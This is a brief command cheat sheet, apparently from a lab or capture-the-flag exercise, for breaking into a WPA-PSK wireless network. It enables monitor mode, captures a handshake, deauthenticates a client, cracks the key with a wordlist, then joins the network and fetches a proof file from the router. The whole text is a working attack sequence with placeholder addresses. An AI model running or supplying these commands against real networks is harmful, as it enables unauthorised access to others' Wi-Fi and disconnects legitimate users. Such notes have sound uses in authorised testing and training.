sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
# -c channel -w output filename = recon-0#
sudo airodump-ng -c # --essid AP_NAME --bssid XX:XX:XX:XX:XX:XX -w wpa --output-format pcap wlan0mon
#-a AP MAC -c Client MAC
sudo aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY wlan0mon
#-b bssid -e essid
aircrack-ng -w /usr/share/john/password.lst -e AP_NAME -b XX:XX:XX:XX:XX:XX wpa-01.cap
network={
ssid="network"
scan_ssid=1
psk="password"
key_mgmt=WPA-PSK
}
wpa_supplicant -c <config file>
sudo dhclient wlan0
curl http://192.168.1.1/proof.txt